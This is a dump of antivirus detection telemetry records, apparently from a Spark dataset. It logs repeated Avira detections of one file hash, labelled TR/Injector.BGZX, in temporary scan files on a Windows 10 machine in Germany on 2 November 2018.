  Row(detection=Row(filename='avscan-20181102-053609-2c4e543c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053609-2C4E543C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061810-0ae47c89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061810-0AE47C89', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055358-a90f4e7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055358-A90F4E7C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061851-231a4d0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061851-231A4D0A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053631-38f5088b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053631-38F5088B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055342-9f6f4bfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055342-9F6F4BFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060805-a2247a2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060805-A2247A2D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053631-39076be7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053631-39076BE7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051616-64ecaeba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051616-64ECAEBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060859-c279856b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060859-C279856B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055006-1eed13da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055006-1EED13DA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061854-24f75532', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061854-24F75532', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055011-21c0e0be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055011-21C0E0BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062104-72649ec2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062104-72649EC2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053620-32eb5349', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053620-32EB5349', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053620-32e3ba93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053620-32E3BA93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051612-62a71540', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051612-62A71540', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062135-84f2109f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062135-84F2109F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055012-225ee621', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055012-225EE621', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061834-19286e7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061834-19286E7A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062153-8fcb0dc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062153-8FCB0DC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060852-bdee827c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060852-BDEE827C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055340-9e986cc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055340-9E986CC2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055049-38ac6f9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055049-38AC6F9F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055352-a5c28034', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055352-A5C28034', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060851-bda5422f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060851-BDA5422F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062159-935d5401', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062159-935D5401', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062159-9321afaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062159-9321AFAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055018-263465b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055018-263465B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062110-75fbb019', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062110-75FBB019', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060828-afb51fad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060828-AFB51FAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062132-833d802c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062132-833D802C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055040-3373237d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055040-3373237D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055039-32998347', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055039-32998347', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061614-c5a08f10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061614-C5A08F10', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055100-3f0a06eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055100-3F0A06EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055343-a0017ec4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055343-A0017EC4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055038-31dffbe9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055038-31DFFBE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062122-7d38e3b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062122-7D38E3B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051639-726f4908', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051639-726F4908', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055038-31c0d9dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055038-31C0D9DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055038-321092e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055038-321092E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055313-8e1f74aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055313-8E1F74AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061717-eb04b66c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061717-EB04B66C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061718-eb80ab7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061718-EB80AB7A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055344-a115478d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055344-A115478D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055313-8e416479', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055313-8E416479', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061824-12d5deb0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061824-12D5DEB0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055312-8e0506ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055312-8E0506AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062542-1856c2ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062542-1856C2FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061750-fed2bf18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061750-FED2BF18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061856-26373f7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061856-26373F7D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061747-fd18963e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061747-FD18963E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062542-180717af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062542-180717AF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052001-eb41993a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052001-EB41993A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:00Z'), dt=datetime.date(2018, 11, 2)),
